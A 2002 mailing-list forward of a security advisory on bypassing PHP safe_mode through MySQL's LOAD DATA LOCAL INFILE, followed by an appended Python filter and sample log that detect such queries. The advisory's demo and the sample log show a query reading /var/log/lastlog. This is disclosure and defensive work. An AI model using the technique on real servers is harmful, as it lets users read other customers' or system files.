[Plug-security] [Fwd: PHP Safe Mode Filesystem Circumvention Problem]

Rusty Carruth Plug watcher plug-security@lists.PLUG.phoenix.az.us
Tue, 5 Feb 2002 13:55:00 -0700 (MST)


(there, that's the right list now) 

> -------- Original Message --------
> Subject: PHP Safe Mode Filesystem Circumvention Problem
> From: Dave Wilson <dw@dahomelands.net>
> 
> 
> 
> ------------------------------------------------------------------------------
> 
>                          Security Advisory DW020203-PHP
>                            Release: 3rd February 2002
> 
>                  PHP Safe Mode Filesystem Circumvention Problem
> 
>  Severity:   Medium to high.
>  Affects:    PHP, all versions which include safe_mode feature.
>  Platform:   UNIX, Microsoft Windows, any platforms on which PHP is available.
>  Vendor:     http://php.net.
>  Discovered: 12th January 2002, Dave Wilson <dw@dahomelands.net>, using
>              PHP 4.1.0 & Apache 2 on Linux.
> 
> 
> ------------------------------------------------------------------------------
> 
> 
> VULNERABILITY IN BRIEF
> 
>    PHP (since version 3?) includes a commonly used feature known as Safe
>    Mode. When enabled, scripts are highly limited in their ability to
>    access or execute local files, among other things.
> 
>    PHP relies on a wrapper function around all filesystem calls to
>    perform access checks, but unfortunately the bundled MySQL client
>    library has not been modified to perform such checks on
>    "LOAD DATA INFILE LOCAL" statements.
> 
>    If an attacker has access to a MySQL server (either provided by you
>    or himself), he can use it as a proxy by which to download files
>    residing on the safe_mode-enabled web server. For large ISPs relying
>    on this feature for individual customer privacy, it could mean clients
>    accessing each other's files, or viewing of files on an improperly
>    secured server.
> 
> 
> FIX
> 
>    Currently, no fix exists. You may use other PHP safe_mode functions
>    to disable the use of the MySQL client library, or secure your servers
>    in a proper fashion. A suggested fix for the PHP developers might be
>    to scan mysql_query()s for strings similar to "LOAD DATA LOCAL INFILE".
> 
>    Happy hackers out there might like to look at libmysql.c:1764 if
>    interested in fixing this problem, although that may only be possible
>    from within PHP.
> 
> 
> EXAMPLE
> 
>    The attached script will (once configured correctly) attempt to read
>    "/var/log/lastlog" via the SQL daemon and return it to the client.
> 
>    $ cp safe_mode.php /www
>    $ wget -qO lastlog_via_mysql localhost/safe_mode.php
>    $ diff /var/log/lastlog lastlog_via_mysql; echo $?
>    0
> 
> 
> COMMENTS
> 
>    Due to the nature of the PHP project, development is very rapid and
>    hence many sites do not keep up with latest PHP versions. If a fix was
>    available, it would take quite a while to propagate.
> 
>    It is likely that this is not an isolated problem in PHP; my bets are
>    on PostgreSQL and other PHP database extensions missing this one too.
> 
>    The MySQL support has been enabled in PHP by default for as long as I
>    can remember.
> 
> 
> DAVE WILSON
> 
>    Currently residing in Belfast, Northern Ireland, he is available for
>    work relating to network security auditing, post-attack recovery and
>    forensics, and penetration testing. He may be contacted at
>    <dw@dahomelands.net>. If you have any comments regarding this advisory,
>    please contact him directly.
> 
> 
> Sun Feb  3 21:23:03 GMT 2002 -dw
> 
> 
> 
> <<  End forwarded message
> 
>
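The advisory's suggested stopgap is to scan statements for "LOAD DATA LOCAL INFILE" before they reach mysql_query(). The following is an added example (not the advisory's script and not PHP project code) of what such a filter needs to handle to be worth deploying: MySQL's optional LOW_PRIORITY/CONCURRENT keyword, arbitrary whitespace and case, and comments inserted between keywords. It also runs the same check over a constructed general-log excerpt so an operator can spot the pattern after the fact. `run_query` and the log lines are assumptions.

```python
import re

# LOAD DATA [LOW_PRIORITY | CONCURRENT] LOCAL INFILE, matched on upper-cased,
# whitespace-collapsed text. Plain "LOAD DATA INFILE" (server-side file) is
# deliberately not matched; only the LOCAL form makes the *client* read a file.
LOAD_LOCAL_RE = re.compile(
    r"\bLOAD\s+DATA\s+(?:(?:LOW_PRIORITY|CONCURRENT)\s+)?LOCAL\s+INFILE\b"
)


def normalize_sql(sql: str) -> str:
    """Strip /* */, '-- ' and '#' comments, collapse whitespace, upper-case."""
    sql = re.sub(r"/\*.*?\*/", " ", sql, flags=re.DOTALL)
    sql = re.sub(r"(?:--[ \t]|#).*?$", " ", sql, flags=re.MULTILINE)
    return " ".join(sql.split()).upper()


def uses_local_infile(sql: str) -> bool:
    """True if the statement would make the client library open a local file.

    Both the raw and the comment-stripped forms are checked: the stripped
    form catches keywords split by a comment ("LOAD /**/ DATA"), the raw
    form guards against a '#' inside a quoted path swallowing the rest."""
    raw = " ".join(sql.split()).upper()
    return bool(LOAD_LOCAL_RE.search(raw) or LOAD_LOCAL_RE.search(normalize_sql(sql)))


def safe_query(sql: str, run_query):
    """Pre-query gate in the spirit of the advisory's suggested fix.
    run_query is the real query callable (hypothetical, injected for testing)."""
    if uses_local_infile(sql):
        raise PermissionError("LOAD DATA LOCAL INFILE refused under safe_mode policy")
    return run_query(sql)


# Constructed MySQL general-log style excerpt (sample data, not a real log).
SAMPLE_LOG = """\
020203 21:23:03       5 Query     USE test_database
020203 21:23:03       5 Query     CREATE TEMPORARY TABLE A1012771383 (a LONGBLOB)
020203 21:23:04       5 Query     load data /* split */ local infile '/var/log/lastlog' into table A1012771383
020203 21:23:04       5 Query     SELECT a FROM A1012771383 LIMIT 1
020203 21:23:09       6 Query     LOAD DATA INFILE '/var/lib/mysql-files/x.csv' INTO TABLE t
"""


def find_local_infile(log_text: str):
    """Return (line number, statement) for every logged LOAD DATA LOCAL query."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        if "Query" in line:
            stmt = line.split("Query", 1)[1].strip()
            if uses_local_infile(stmt):
                hits.append((n, stmt))
    return hits
```

A string-level gate like this is a stopgap: the durable mitigation is to disable the feature in the client library or on the server (MySQL's `local_infile=0`), so no query text can reach the file-reading code path at all.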